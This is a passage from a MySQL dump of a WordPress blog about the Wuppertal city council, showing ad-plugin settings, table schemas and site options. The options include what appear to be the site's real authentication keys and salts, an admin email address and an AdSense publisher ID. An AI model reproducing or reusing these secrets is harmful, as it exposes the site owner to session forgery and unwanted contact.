07:30:17','easy-adsense','twentythirteen','AdSense','Default','margin_lu','12'),(75,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','text_lu','Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.'),(76,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','title_gsearch',''),(77,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','title_gsearch_custom',''),(78,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','kill_gsearch_title',''),(79,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','margin_gsearch','0'),(80,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','text_gsearch','Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.'),(81,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','max_count','1'),(82,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','max_link','0'),(83,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','force_midad','on'),(84,'2015-05-07 07:30:17','easy-adsense','twentythirteen','AdSense','Default','force_widget',''),(85,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_page',''),(86,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','show_borders',''),(87,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','border_width','1'),(88,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','border_normal','00FFFF'),(89,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','border_color','FF0000'),(90,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','border_widget',''),(91,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','border_lu',''),(92,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','title_lu',''),(93,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_lu_title',''),(94,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_attachment',''),(95,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_home',''),(96,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_front_page',''),(97,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_category',''),(98,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_tag',''),(99,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_archive',''),(100,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_inline',''),(101,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_widget_title',''),(102,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_linebreaks',''),(103,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_single',''),(104,'2015-05-07 07:30:18','easy-adsense','twentythirteen','AdSense','Default','kill_search',''),(105,'2015-05-07 07:30:19','easy-adsense','twentythirteen','AdSense','Default','kill_sticky',''),(106,'2015-05-07 07:30:19','easy-adsense','twentythirteen','AdSense','Default','title_widget',''),(107,'2015-05-07 07:30:19','easy-adsense','twentythirteen','AdSense','Default','suppressBoxes',''),(108,'2015-05-07 07:30:19','easy-adsense','twentythirteen','AdSense','Default','kill_invites',''),(109,'2015-05-07 07:30:19','easy-adsense','twentythirteen','AdSense','Default','kill_rating',''),(110,'2015-05-07 07:30:19','easy-adsense','twentythirteen','AdSense','Default','kill_author',''); /*!40000 ALTER TABLE `wp_ez_adsense_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_kento_like_post_info` -- DROP TABLE IF EXISTS `wp_kento_like_post_info`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_kento_like_post_info` ( `id` int(100) NOT NULL AUTO_INCREMENT, `postid` int(10) NOT NULL, `userid` int(10) NOT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_kento_like_post_info` -- LOCK TABLES `wp_kento_like_post_info` WRITE; /*!40000 ALTER TABLE `wp_kento_like_post_info` DISABLE KEYS */; INSERT INTO `wp_kento_like_post_info` VALUES (1,224,1); /*!40000 ALTER TABLE `wp_kento_like_post_info` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_links` -- DROP TABLE IF EXISTS `wp_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_links` ( `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y', `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1', `link_rating` int(11) NOT NULL DEFAULT '0', `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL, `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_links` -- LOCK TABLES `wp_links` WRITE; /*!40000 ALTER TABLE `wp_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_options` -- DROP TABLE IF EXISTS `wp_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_options` ( `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `option_name` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`) ) ENGINE=InnoDB AUTO_INCREMENT=18589 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_options` -- LOCK TABLES `wp_options` WRITE; /*!40000 ALTER TABLE `wp_options` DISABLE KEYS */; INSERT INTO `wp_options` VALUES (1,'siteurl','http://www.ollital.de/wordpress','yes'),(2,'blogname','Pirat im #talrat','yes'),(3,'blogdescription','Informationen aus dem Rat der Stadt Wuppertal','yes'),(4,'users_can_register','0','yes'),(5,'admin_email','piratolli@ollital.de','yes'),(6,'start_of_week','1','yes'),(7,'use_balanceTags','1','yes'),(8,'use_smilies','1','yes'),(9,'require_name_email','1','yes'),(10,'comments_notify','1','yes'),(11,'posts_per_rss','10','yes'),(12,'rss_use_excerpt','0','yes'),(13,'mailserver_url','mail.example.com','yes'),(14,'mailserver_login','login@example.com','yes'),(15,'mailserver_pass','password','yes'),(16,'mailserver_port','110','yes'),(17,'default_category','1','yes'),(18,'default_comment_status','open','yes'),(19,'default_ping_status','open','yes'),(20,'default_pingback_flag','1','yes'),(21,'posts_per_page','10','yes'),(22,'date_format','j. F Y','yes'),(23,'time_format','H:i','yes'),(24,'links_updated_date_format','F j, Y g:i a','yes'),(28,'comment_moderation','1','yes'),(29,'moderation_notify','1','yes'),(30,'permalink_structure','/index.php/%year%/%monthnum%/%postname%/','yes'),(32,'hack_file','0','yes'),(33,'blog_charset','UTF-8','yes'),(34,'moderation_keys','','no'),(35,'active_plugins','a:8:{i:0;s:29:\"antispam-bee/antispam_bee.php\";i:1;s:35:\"cookie-law-info/cookie-law-info.php\";i:2;s:19:\"jetpack/jetpack.php\";i:3;s:30:\"multi-author-adsense/index.php\";i:4;s:34:\"phpsword-favicon-manager/index.php\";i:5;s:31:\"smooth-slider/smooth-slider.php\";i:6;s:25:\"tablepress/tablepress.php\";i:7;s:47:\"wp-security-audit-log/wp-security-audit-log.php\";}','yes'),(36,'home','http://www.ollital.de/wordpress','yes'),(37,'category_base','','yes'),(38,'ping_sites','http://rpc.pingomatic.com/','yes'),(40,'comment_max_links','2','yes'),(41,'gmt_offset','','yes'),(42,'default_email_category','1','yes'),(43,'recently_edited','a:5:{i:0;s:80:\"/var/www/wordpress/wp-content/plugins/advanced-ads-responsive/responsive-ads.php\";i:1;s:67:\"/var/www/wordpress/wp-content/plugins/advanced-ads/advanced-ads.php\";i:3;s:67:\"/var/www/wordpress/wp-content/plugins/ajax-adsense/easy-adsense.php\";i:4;s:57:\"/var/www/wordpress/wp-content/plugins/akismet/akismet.php\";i:5;s:76:\"/var/www/wordpress/wp-content/plugins/2kb-amazon-affiliates-store/plugin.php\";}','no'),(44,'template','twentythirteen','yes'),(45,'stylesheet','twentythirteen','yes'),(46,'comment_whitelist','1','yes'),(47,'blacklist_keys','','no'),(48,'comment_registration','1','yes'),(49,'html_type','text/html','yes'),(50,'use_trackback','0','yes'),(51,'default_role','subscriber','yes'),(52,'db_version','35700','yes'),(53,'uploads_use_yearmonth_folders','1','yes'),(54,'upload_path','','yes'),(55,'blog_public','1','yes'),(56,'default_link_category','0','yes'),(57,'show_on_front','posts','yes'),(58,'tag_base','','yes'),(59,'show_avatars','1','yes'),(60,'avatar_rating','G','yes'),(61,'upload_url_path','','yes'),(62,'thumbnail_size_w','150','yes'),(63,'thumbnail_size_h','150','yes'),(64,'thumbnail_crop','1','yes'),(65,'medium_size_w','300','yes'),(66,'medium_size_h','300','yes'),(67,'avatar_default','mystery','yes'),(68,'large_size_w','1024','yes'),(69,'large_size_h','1024','yes'),(70,'image_default_link_type','file','yes'),(71,'image_default_size','','yes'),(72,'image_default_align','','yes'),(73,'close_comments_for_old_posts','','yes'),(74,'close_comments_days_old','14','yes'),(75,'thread_comments','1','yes'),(76,'thread_comments_depth','5','yes'),(77,'page_comments','','yes'),(78,'comments_per_page','50','yes'),(79,'default_comments_page','newest','yes'),(80,'comment_order','desc','yes'),(81,'sticky_posts','a:0:{}','yes'),(82,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(83,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(84,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(85,'uninstall_plugins','a:4:{s:43:\"google-analytics-dashboard-for-wp/gadwp.php\";a:2:{i:0;s:15:\"GADWP_Uninstall\";i:1;s:9:\"uninstall\";}s:25:\"kento-like-post/index.php\";N;s:29:\"antispam-bee/antispam_bee.php\";a:2:{i:0;s:12:\"Antispam_Bee\";i:1;s:9:\"uninstall\";}s:35:\"cookie-law-info/cookie-law-info.php\";s:30:\"cookielawinfo_uninstall_plugin\";}','no'),(86,'timezone_string','Europe/Berlin','yes'),(87,'page_for_posts','0','yes'),(88,'page_on_front','0','yes'),(89,'default_post_format','0','yes'),(90,'link_manager_enabled','0','yes'),(91,'initial_db_version','24448','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:72:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:29:\"tablepress_import_tables_wptr\";b:1;s:23:\"tablepress_edit_options\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:43:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:19:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(98,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:7:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";i:6;s:11:\"tag_cloud-2\";}s:9:\"sidebar-2\";a:1:{i:0;s:18:\"twitter_timeline-2\";}s:13:\"array_version\";i:3;}','yes'),(99,'cron','a:11:{i:1451385732;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1451387948;a:1:{s:12:\"wsal_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1451414580;a:1:{s:20:\"wp_maybe_auto_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1451421734;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1451421772;a:1:{s:24:\"jp_purge_transients_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1451424646;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1451424647;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1451424686;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1451425833;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1451436254;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(101,'_transient_random_seed','8d5f4c3147644e83bd31b1d37dd0c77e','yes'),(103,'auth_key','IqgUf=KGgk)c_!PtA]TJ=A,y2#x5*EKUltGkK8W4T!+aB8B7I$8SX%;f^/9/{LPa','yes'),(104,'auth_salt','Yn9r-_{l3*NW:QubD~.7yJ@GWufZ){xag:jtDn`h0 A@{]MU]uFPif[fmlH@mcQIt','yes'),(108,'nonce_key','V1V)rS;n]6Ek Da{pHN>!j}In;qqTz4oXL>7v#.a%3z(fw |FTst8WY6YIor])Y%','yes'),(112,'nonce_salt','Sm4e++w9.bu+.(RQe,A|8joZ=In}n=Lo#s}c|C!@~3I=5<9hl@1AUCI1nbjI&?[C','yes'),(115,'dashboard_widget_options','a:4:{s:25:\"dashboard_recent_comments\";a:1:{s:5:\"items\";i:5;}s:24:\"dashboard_incoming_links\";a:5:{s:4:\"home\";s:31:\"http://www.ollital.de/wordpress\";s:4:\"link\";s:107:\"http://blogsearch.google.com/blogsearch?scoring=d&partner=wordpress&q=link:http://www.ollital.de/wordpress/\";s:3:\"url\";s:140:\"http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://www.ollital.de/wordpress/\";s:5:\"items\";i:10;s:9:\"show_date\";b:0;}s:17:\"dashboard_primary\";a:7:{s:4:\"link\";s:26:\"http://wordpress.org/news/\";s:3:\"url\";s:31:\"http://wordpress.org/news/feed/\";s:5:\"title\";s:14:\"WordPress Blog\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:1;}s:19:\"dashboard_secondary\";a:7:{s:4:\"link\";s:28:\"http://planet.wordpress.org/\";s:3:\"url\";s:33:\"http://planet.wordpress.org/feed/\";s:5:\"title\";s:20:\"Other WordPress News\";s:5:\"items\";i:5;s:12:\"show_summary\";i:0;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;}}','yes'),(144,'theme_mods_twentythirteen','a:2:{s:16:\"header_textcolor\";s:6:\"000000\";s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:0;}}','yes'),(287,'recently_activated','a:0:{}','yes'),(399,'akismet_spam_count','2','yes'),(440,'gadash_options','{\"ga_dash_apikey\":\"\",\"ga_dash_clientid\":\"\",\"ga_dash_clientsecret\":\"\",\"ga_dash_access_front\":[\"administrator\"],\"ga_dash_access_back\":[\"administrator\"],\"ga_dash_tableid_jail\":\"\",\"ga_dash_pgd\":0,\"ga_dash_rd\":0,\"ga_dash_sd\":0,\"ga_dash_map\":0,\"ga_dash_traffic\":0,\"ga_dash_style\":\"#3366CC\",\"ga_dash_cachetime\":3600,\"ga_dash_tracking\":1,\"ga_dash_tracking_type\":\"universal\",\"ga_dash_default_ua\":\"\",\"ga_dash_anonim\":0,\"ga_dash_userapi\":0,\"ga_event_tracking\":0,\"ga_event_downloads\":\"zip|mp3*|mpe*g|pdf|docx*|pptx*|xlsx*|rar*\",\"ga_track_exclude\":[],\"ga_target_geomap\":\"\",\"ga_target_number\":10,\"ga_realtime_pages\":10,\"ga_dash_token\":\"\",\"ga_dash_refresh_token\":\"\",\"ga_dash_profile_list\":[],\"ga_dash_tableid\":\"\",\"ga_dash_frontend_keywords\":0,\"ga_enhanced_links\":0,\"ga_dash_remarketing\":0,\"ga_dash_default_metric\":\"visits\",\"ga_dash_default_dimension\":\"30daysAgo\",\"ga_dash_frontend_stats\":0,\"ga_dash_network\":0,\"ga_dash_adsense\":0,\"ga_speed_samplerate\":1,\"ga_event_bouncerate\":0,\"ga_crossdomain_tracking\":0,\"ga_crossdomain_list\":\"\",\"ga_author_dimindex\":0,\"ga_category_dimindex\":0,\"ga_user_dimindex\":0,\"ga_pubyear_dimindex\":0,\"ga_aff_tracking\":0,\"ga_event_affiliates\":\"\\/out\\/\",\"ga_dash_hidden\":\"Y\",\"automatic_updates_minorversion\":1,\"ga_dash_excludesa\":0,\"ga_hash_tracking\":0,\"item_reports\":1,\"dashboard_widget\":1,\"switch_profile\":0}','yes'),(441,'gadwp_version','4.7.1','yes'),(442,'gadash_lasterror','2014-11-17 08:49:06: CURL disabled. Please enable CURL!','yes'),(2591,'_transient_plugins_delete_result_1','1','yes'),(2593,'PhpswFaviconManagerOptions','a:6:{s:14:\"PhpswFMVersion\";s:3:\"1.0\";s:18:\"PhpswFMVersionType\";s:4:\"free\";s:14:\"PhpswFavStatus\";s:1:\"1\";s:18:\"PhpswActiveFavicon\";s:7:\"default\";s:7:\"FavURL1\";s:95:\"https://www.ollital.de/wordpress/wp-content/plugins/PhpSword-Favicon-Manager/images/favicon.png\";s:7:\"FavURL2\";s:95:\"https://www.ollital.de/wordpress/wp-content/plugins/PhpSword-Favicon-Manager/images/favicon.png\";}','yes'),(2788,'ezAdSensetwentythirteen','a:55:{s:11:\"show_leadin\";s:11:\"float:right\";s:9:\"wc_leadin\";s:1:\"0\";s:13:\"margin_leadin\";s:2:\"12\";s:11:\"text_leadin\";s:357:\"\r\n\r\n\r\n\";s:12:\"show_midtext\";s:10:\"float:left\";s:13:\"header_leadin\";s:0:\"\";s:10:\"wc_midtext\";s:1:\"0\";s:14:\"margin_midtext\";s:2:\"12\";s:12:\"text_midtext\";s:357:\"\r\n\r\n\r\n\";s:12:\"show_leadout\";s:2:\"no\";s:10:\"wc_leadout\";s:1:\"0\";s:14:\"margin_leadout\";s:2:\"12\";s:12:\"text_leadout\";s:357:\"\r\n\r\n\r\n\";s:11:\"show_widget\";s:17:\"text-align:center\";s:14:\"footer_leadout\";s:0:\"\";s:13:\"margin_widget\";s:2:\"12\";s:11:\"text_widget\";s:150:\"Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.\";s:7:\"show_lu\";s:17:\"text-align:center\";s:9:\"margin_lu\";s:2:\"12\";s:7:\"text_lu\";s:150:\"Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.\";s:13:\"title_gsearch\";s:0:\"\";s:20:\"title_gsearch_custom\";s:0:\"\";s:18:\"kill_gsearch_title\";s:0:\"\";s:14:\"margin_gsearch\";s:1:\"0\";s:12:\"text_gsearch\";s:150:\"Please generate and paste your ad code here. If left empty, the ad location will be highlighted on your blog pages with a reminder to enter your code.\";s:9:\"max_count\";s:1:\"1\";s:8:\"max_link\";s:1:\"0\";s:11:\"force_midad\";s:2:\"on\";s:12:\"force_widget\";s:0:\"\";s:9:\"kill_page\";s:0:\"\";s:12:\"show_borders\";s:0:\"\";s:12:\"border_width\";s:1:\"1\";s:13:\"border_normal\";s:6:\"00FFFF\";s:12:\"border_color\";s:6:\"FF0000\";s:13:\"border_widget\";s:0:\"\";s:9:\"border_lu\";s:0:\"\";s:8:\"title_lu\";s:0:\"\";s:13:\"kill_lu_title\";s:0:\"\";s:15:\"kill_attachment\";s:0:\"\";s:9:\"kill_home\";s:0:\"\";s:15:\"kill_front_page\";s:0:\"\";s:13:\"kill_category\";s:0:\"\";s:8:\"kill_tag\";s:0:\"\";s:12:\"kill_archive\";s:0:\"\";s:11:\"kill_inline\";s:0:\"\";s:17:\"kill_widget_title\";s:0:\"\";s:15:\"kill_linebreaks\";s:0:\"\";s:11:\"kill_single\";s:0:\"\";s:11:\"kill_search\";s:0:\"\";s:11:\"kill_sticky\";s:0:\"\";s:12:\"title_widget\";s:0:\"\";s:13:\"suppressBoxes\";s:0:\"\";s:12:\"kill_invites\";s:0:\"\";s:11:\"kill_rating\";s:0:\"\";s:11:\"kill_author\";s:0:\"\";}','yes'),(2835,'widget_ezadswidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2842,'kbAmzStore','eyJDaGVja291dFBhZ2UiOm51bGx9','yes'),(2875,'ezadsense_force_admin','1','yes'),(2923,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(2933,'advanced-ads-adsense','a:2:{s:10:\"adsense-id\";s:20:\"pub-4101373333307108\";s:14:\"limit-per-page\";s:1:\"1\";}','yes'),(2934,'advanced-ads-internal','a:2:{s:7:\"version\";s:7:\"1.6.4.1\";s:9:\"installed\";i:1431075427;}','yes'),(2935,'advanced-ads-notices','a:2:{s:5:\"queue\";a:0:{}s:6:\"closed\";a:4:{s:14:\"nl_first_steps\";i:1431075757;s: